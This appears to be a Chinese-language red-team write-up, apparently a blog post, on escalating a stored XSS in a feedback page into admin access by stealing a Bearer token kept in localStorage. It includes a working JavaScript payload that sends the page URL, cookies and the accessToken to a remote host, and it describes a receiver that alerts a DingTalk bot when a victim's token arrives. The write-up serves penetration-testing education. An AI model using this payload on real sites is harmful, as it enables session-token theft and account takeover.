某次红队评估项目中实战案例,在web层存储型xss漏洞扩大成果的一种利用方式。大多数时候红队项目时间紧,任务重,会忽略一些比较低危价值不大的漏洞。
知识点:使用xss漏洞获取其他鉴权字段并发送至远程服务器
漏洞描述
经测试发现“明镜Lab”系统存在存储型XSS漏洞。
利用该漏洞可获取到管理员账户cookie、Authorization等敏感信息,从而进入后台系统。
逻辑梳理
通过注册普通用户,登陆系统,打开:个人中心-问题反馈页面。
上传一张图片进行提交,发现使用了html标签进行数据传输,猜测可能存在xss漏洞。修改标签内容,插入javascript语句
随后查看页面,点击详情后触发xss漏洞
其中经过测试发现这个站点并非为cookie鉴权,而是通过Authorization进行身份鉴权。
随后查找Authorization字段的生成路径,发现在成功登陆的返回报文中显示access_token字段。
查找js文件发现access_token字段的存储方式。
localStorage.setItem("useren", !1),
localStorage.setItem("timedata", JSON.stringify(a)),
localStorage.setItem("accessToken", t.access_token),
localStorage.setItem("refreshToken", t.refresh_token),
localStorage.setItem("usernames", t.user_info.username),
什么是localStorage?
在HTML5中,新加入了一个localStorage特性,这个特性主要是用来作为本地存储来使用的,解决了cookie存储空间不足的问题(cookie中每条cookie的存储空间为4k),localStorage中一般浏览器支持的是5M大小。
localStorage的使用
localStorage.getItem(key):获取指定key本地存储的值
localStorage.setItem(key,value):将value存储到key字段
本系统将返回的access_token的值存储在本地,字段名为accessToken,而Header里鉴权的Authorization值为:Bearer accessToken
此时可以通过存储型xss弹出Authorization的内容,控制台打印测试如下
漏洞利用
通过插入远程js链接等方式,获取Authorization值发送至自己服务器进行接收保存,管理员查看留言即可获取目标后台权限。
JS代码如下
获取当前URL(如果管理员账户使用独立后台可获取到后台地址)、Cookie、Authorization
var img = document.createElement('img');
img.width = 0;
img.height = 0;
img.src = 'http://url?h='+encodeURIComponent(window.location.href)+'&c='+encodeURIComponent(document.cookie)+'&t='+encodeURIComponent(localStorage.getItem("accessToken"));
可通过Python写个简单接收端,将接受的数据保存到指定文件,可通过监测文件内容触发规则后通过webhook发送至钉钉机器人等,实现第一时间发现目标上线,避免失效…
管理员上线,web权限+1
如需需要接收端代码,可搜索公众号:明镜Lab,回复:xss2024 进行获取
1373
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
